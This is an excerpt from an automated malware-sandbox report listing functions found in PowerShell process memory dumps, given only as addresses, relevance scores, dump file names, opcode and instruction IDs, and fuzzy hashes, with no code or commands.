                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 7_h$ 7_h$(7_h
                                                                                                                                                                                          • API String ID: 0-3069272733
                                                                                                                                                                                          • Opcode ID: 831f1c16a8ac09968510b3c8e7ce640494b20dd0fe0673a8b09a693b467b330e
                                                                                                                                                                                          • Instruction ID: 17ecd9d85a267235947be3671fc3e486eb4ecdc0057fb40118d2d96d4409ba5c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 831f1c16a8ac09968510b3c8e7ce640494b20dd0fe0673a8b09a693b467b330e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DB23832B0EB890FEB669B6848695B47FE1EF5A210B0A05FED05DC72E3DD19AD05C341
                                                                                                                                                                                          Function 00007FFD9B89A52A Relevance: .6, Instructions: 553COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4bc22dcbf80ce0892fb42d5ec775a51d90bb708dc19a8ab6cc7ff6da41aa1783
                                                                                                                                                                                          • Instruction ID: da6f933778c473f2289d280b8d359517b8cefb1e3f0cf13c79e72c656be2377a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc22dcbf80ce0892fb42d5ec775a51d90bb708dc19a8ab6cc7ff6da41aa1783
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15022B26A0F7C91FEB669B6848656647FE1EF5A210F0A01FED09CCB1E3DD28AC45C341
                                                                                                                                                                                          Function 00007FFD9B7CB8D2 Relevance: .5, Instructions: 458COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1902532718.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c14214eea783eae70c9b8f78ed3a1c453bfe4aeb067b3222a1da08cb42ce38ab
                                                                                                                                                                                          • Instruction ID: 24b554cabf36ea6e37b140fa4dcff9b445681b8e300a62161217573173f55c9b
                                                                                                                                                                                          • Opcode Fuzzy Hash: c14214eea783eae70c9b8f78ed3a1c453bfe4aeb067b3222a1da08cb42ce38ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94E1A430609A8D8FEBA8EF68C8657F977E1EF54310F04826EE84DC73A5CA7499418781
                                                                                                                                                                                          Function 00007FFD9B7CAB62 Relevance: .4, Instructions: 446COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1902532718.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 21091e439db5e31da1b021dccc6df03da69bfb056e25d3696f1feec904ef13f4
                                                                                                                                                                                          • Instruction ID: 64f43621d93412a3526b78d607104140b645413753d5d71cb89ba2ef5ba44dfd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21091e439db5e31da1b021dccc6df03da69bfb056e25d3696f1feec904ef13f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE17030A19A4D8FEBA8EF28C855BF977D1FB54301F00426EE84DC72A5DB3499418B81
                                                                                                                                                                                          Function 00007FFD9B895742 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 6_h
                                                                                                                                                                                          • API String ID: 0-1978871973
                                                                                                                                                                                          • Opcode ID: f529e496e62319129ca2e0391e9ed5a6d74294671dbf1b79ce27d47b55df34e3
                                                                                                                                                                                          • Instruction ID: 2804e300b92b86b3994762378585262b819505b6bb31d0ddf75aac602f7b25fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: f529e496e62319129ca2e0391e9ed5a6d74294671dbf1b79ce27d47b55df34e3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BB11432B0EB9E0FEBA5DB6858646B97FE1EF59220B0901BBD04DC71E3DD18AD048341
                                                                                                                                                                                          Function 00007FFD9B8993C1 Relevance: 1.6, Strings: 1, Instructions: 311COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 7_h
                                                                                                                                                                                          • API String ID: 0-3726126022
                                                                                                                                                                                          • Opcode ID: 7faf13fbc701cc7f14153daf9992f27b0f2eecd66b15529efa172040edc16d40
                                                                                                                                                                                          • Instruction ID: 6579c126b6ad793286f430facb790ef66643ce934be767bdcf44dda656e4615c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7faf13fbc701cc7f14153daf9992f27b0f2eecd66b15529efa172040edc16d40
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE910861B0FB8D0FDB679B6848695747FE1EF9A210B0A05FBD04DC72E3D919AD058381
                                                                                                                                                                                          Function 00007FFD9B7CCF75 Relevance: .7, Instructions: 687COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1902532718.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1d64efb872325e840f6262c6758f46bcd1946853ceb80b72c9e12339c2b17c80
                                                                                                                                                                                          • Instruction ID: e1078cbbb5cb597cabd06317b45e4e3b73ea3477d5fa977318f6b2cf44c9bc73
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d64efb872325e840f6262c6758f46bcd1946853ceb80b72c9e12339c2b17c80
                                                                                                                                                                                          • Instruction Fuzzy Hash: 55328330A18A4D9FDF98EF5CC4A5AB977E1FF98310F11426ED409D72A5CA35E881CB81
                                                                                                                                                                                          Function 00007FFD9B89ADB0 Relevance: .5, Instructions: 504COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2436f438aeef4debb938e8124b54f19677705c863ed556cd2a9e0b36dd50a19f
                                                                                                                                                                                          • Instruction ID: 676d8f98dbd43752694fde8563386601304a9b53507abf2ae59fecfbcf25bacb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2436f438aeef4debb938e8124b54f19677705c863ed556cd2a9e0b36dd50a19f
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F12962B0EBC90FEBA59B6848656687FE1EF5A214F1901FED05CC71E3DD28AC458342
                                                                                                                                                                                          Function 00007FFD9B7C3DF2 Relevance: .5, Instructions: 469COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1902532718.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d04dd18d6629127e093f278e2cc2b11fde29266adcadfd56fce5a1af99345a0c
                                                                                                                                                                                          • Instruction ID: 5fefef485f609d51719e608e77b64983a620a6ae2fbf5e00b74ec9c7b4c86645
                                                                                                                                                                                          • Opcode Fuzzy Hash: d04dd18d6629127e093f278e2cc2b11fde29266adcadfd56fce5a1af99345a0c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B5E1D631B09A4D5FEB94EF9CC465AE977F1FF68300F15427AD449C72A6CE34A8828790
                                                                                                                                                                                          Function 00007FFD9B899948 Relevance: .4, Instructions: 418COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 793d476f385f849e1090acc32d8a0de767dba4e4c3efa373cafb51b6a986864f
                                                                                                                                                                                          • Instruction ID: b24f43179198060d391f1674c2bb473aafbbd32d678c3490e95eb8b3f5a3e8f0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 793d476f385f849e1090acc32d8a0de767dba4e4c3efa373cafb51b6a986864f
                                                                                                                                                                                          • Instruction Fuzzy Hash: DCE12722F0FAC90FEBA59B6848696687FE1EF5A214F1A04FED05C872E3DD186D458341
                                                                                                                                                                                          Function 00007FFD9B89AE02 Relevance: .4, Instructions: 404COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: cbf6447f129221a9b64295519671383295848b0945d11bc71dfe746f96aa0235
                                                                                                                                                                                          • Instruction ID: 6a2824a51d2a0efd4981f4dde1f50083d3c97f541b87b137e10eea39edf8a287
                                                                                                                                                                                          • Opcode Fuzzy Hash: cbf6447f129221a9b64295519671383295848b0945d11bc71dfe746f96aa0235
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BD1F962F0EBC90FEBA5DB6848656687BE2EF5A214F1901FED05CC71E3DD28AC458341
                                                                                                                                                                                          Function 00007FFD9B89A0FD Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e7eadfcf05cd50a53554d9afae4d5bbb63d182f440037fa151582cf31a55632c
                                                                                                                                                                                          • Instruction ID: d65ea4fcc1ce1cea0c9b1fd5f571c3820853fc020a982a920871f8b6a7b1c930
                                                                                                                                                                                          • Opcode Fuzzy Hash: e7eadfcf05cd50a53554d9afae4d5bbb63d182f440037fa151582cf31a55632c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EA14B25B0EB8D1FEFA69BA848645B57FE1DF5A210B0A00FBD44DCB1E3D925AD05C381
                                                                                                                                                                                          Function 00007FFD9B7CB4E6 Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1902532718.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 976c16cacea16c5aa7b79fe3165eee28ce2e1bc9b86eae8ebcf5a032c59ad253
                                                                                                                                                                                          • Instruction ID: c8571cd013fb74f28e6016a1ee5cdd5d460aa594ae64c8632d40133481a282db
                                                                                                                                                                                          • Opcode Fuzzy Hash: 976c16cacea16c5aa7b79fe3165eee28ce2e1bc9b86eae8ebcf5a032c59ad253
                                                                                                                                                                                          • Instruction Fuzzy Hash: 56B1B530609B8D4FDB68EF28D8557F93BD1EF55310F14826EE84DC73A6CA3499458B82
                                                                                                                                                                                          Function 00007FFD9B8947E9 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 76b237814418afe34317c013d061b6288e9403e1daec82af42f5a08c723ecda3
                                                                                                                                                                                          • Instruction ID: 1afd8a27bc5ebb599a8835e9a2a060c972fbfb4eced40b4f4c4230a7a4a06c82
                                                                                                                                                                                          • Opcode Fuzzy Hash: 76b237814418afe34317c013d061b6288e9403e1daec82af42f5a08c723ecda3
                                                                                                                                                                                          • Instruction Fuzzy Hash: C071F722F1FA8E0FEBB99BAC54716787AC1EF99210B4D01BED45DC31F3ED19A9054241
                                                                                                                                                                                          Function 00007FFD9B89AACA Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2fd6313eefdeb40adb674430125540fa7d12046341d3d0647b267eb0a07a36b4
                                                                                                                                                                                          • Instruction ID: 6b9fa63dbc868dbdfcfbf46d2cba1671d2740f506fe68af7a752010969816c27
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd6313eefdeb40adb674430125540fa7d12046341d3d0647b267eb0a07a36b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: E271F926A0E7CD5FDB629B6848745A47FE1DF57211B0A00FBC099CB0F3DA28AD45C352
                                                                                                                                                                                          Function 00007FFD9B8997A8 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: bd64fb870c3ba96148e4a14a92a84b95bb6310eb34923552d27c24ed135ee372
                                                                                                                                                                                          • Instruction ID: fe16dac121a7885853161b9d3185acfb47cb995dfe113951f71fca1fe82664ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: bd64fb870c3ba96148e4a14a92a84b95bb6310eb34923552d27c24ed135ee372
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0641C421A0F7C90FEB679B6848745647FA19F57214B0A04FBC498CB2F3D9196D49C352
                                                                                                                                                                                          Function 00007FFD9B895822 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c71edbbaee5c96f5db0525395a012a6667f95dbf9be1e384184f7cd5d4d5b9a3
                                                                                                                                                                                          • Instruction ID: dbf788324d8139ca121d50a516adb92c0387d71c6db40471b0578717d073d461
                                                                                                                                                                                          • Opcode Fuzzy Hash: c71edbbaee5c96f5db0525395a012a6667f95dbf9be1e384184f7cd5d4d5b9a3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A310522F1FBDE0FFBB59BA818711F96DC1AF59660B4A00BAD45DD31E3DD0869008341
                                                                                                                                                                                          Function 00007FFD9B8948E4 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d6ee1a05a6ea2cb9004b4104b9810c33e148db808ea829b9e6b3c0012dd478c5
                                                                                                                                                                                          • Instruction ID: f31cc23628e297ca8d8562f61f81cd2e1585a7c85cc8b09fd0d156bcf6ce7290
                                                                                                                                                                                          • Opcode Fuzzy Hash: d6ee1a05a6ea2cb9004b4104b9810c33e148db808ea829b9e6b3c0012dd478c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C21F722F1FA9E0FEBB5AB6C14A11746AC2EF99220B5E00BED05DC71F7ED19AC014205
                                                                                                                                                                                          Function 00007FFD9B7CAFE4 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1902532718.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d6221fd6054113745fe04ef5297e4efe80a2d630844be0b0cf795cae95b50668
                                                                                                                                                                                          • Instruction ID: d1babdd1a0670c4cf7fed3692946d598ff541947c9bee08a7cbcc99fc393842e
                                                                                                                                                                                          • Opcode Fuzzy Hash: d6221fd6054113745fe04ef5297e4efe80a2d630844be0b0cf795cae95b50668
                                                                                                                                                                                          • Instruction Fuzzy Hash: 69313E30A1964D9EFBB4AF54CC6AFF93290FF41318F41423DE45D862B2CA386A85CB51
                                                                                                                                                                                          Function 00007FFD9B89121F Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8f568920de64f087be07c2797dc1d7429d54afea59bad3ae88e984f9ddc884e0
                                                                                                                                                                                          • Instruction ID: 644a5745bd56efdb10dc7279e47ded82140dcef0a57f65345f27abd0c1835691
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f568920de64f087be07c2797dc1d7429d54afea59bad3ae88e984f9ddc884e0
                                                                                                                                                                                          • Instruction Fuzzy Hash: D021D663F0F6CA2FFBA1F7A808A50642FE19F6A650B0900FFD099CB0E3DC1959098311
                                                                                                                                                                                          Function 00007FFD9B7C3945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1902532718.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                          • Instruction ID: 67009783b815206e014eda1c76a4d49ad1f10b7833254bf7f0380637a75b31ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1101A73020CB0C4FD748EF0CE051AB5B3E0FB85324F10066EE58AC36A1D632E881CB41

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 00007FFD9B7C3AF3 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1902532718.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e54026225c00bfdb0225ff5315c932d62d05405b0da3a548e6f72a4a3dae510f
                                                                                                                                                                                          • Instruction ID: 8263dd79d17bf7501e4976fb30bb2830de521d509b38405c0e32e4be93342a5a
                                                                                                                                                                                          • Opcode Fuzzy Hash: e54026225c00bfdb0225ff5315c932d62d05405b0da3a548e6f72a4a3dae510f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F31F83BA0D2915FE319F7BCF4F68D93B60DF8123A71A41B7D099CE0A3DD14504A82A4

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0282E6A8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: \VCm
                                                                                                                                                                                          • API String ID: 0-553204775
                                                                                                                                                                                          • Opcode ID: bf14b14b6fef964b3edb4e3a9079937a0389de55f38439723f47f0c6ec7df08f
                                                                                                                                                                                          • Instruction ID: a79f5d8986139b702b85c1955457db5461e50382ad83f8fec31f48b059d4f5a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: bf14b14b6fef964b3edb4e3a9079937a0389de55f38439723f47f0c6ec7df08f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B15278E00229CFDF14CFA9C88579DBBF2AF88314F148129D859E7254EB74A889CF55
                                                                                                                                                                                          Function 0282EF78 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 604e2ce9d969c391a9e4b8ed4445c946dea272e93f01030035195ef26e67c7d2
                                                                                                                                                                                          • Instruction ID: 402025adb7919c6e4830dc8afd6fd242abb3b2977cd9aade38731b9ba7944723
                                                                                                                                                                                          • Opcode Fuzzy Hash: 604e2ce9d969c391a9e4b8ed4445c946dea272e93f01030035195ef26e67c7d2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 90B17E78E002298FDB10CFA9C88179DBBF2EF59714F148129D919E7694EB749889CB81
                                                                                                                                                                                          Function 07007330 Relevance: 31.1, Strings: 24, Instructions: 1147COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-1015380950
                                                                                                                                                                                          • Opcode ID: 3b281e97fb3c0092c056e8186981a64f1745e82286ccfdbb44394a5debff6d70
                                                                                                                                                                                          • Instruction ID: 3ed0ed51d5efcd2e8eed85ec3406059714de7d4498a227bbceca56d063b58635
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b281e97fb3c0092c056e8186981a64f1745e82286ccfdbb44394a5debff6d70
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF92C6B4B002058FEB54DBA8C854B6ABBF2BF85320F14C6AAD5059B3D5CB31DD85CB91
                                                                                                                                                                                          Function 07002AA8 Relevance: 15.4, Strings: 12, Instructions: 450COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
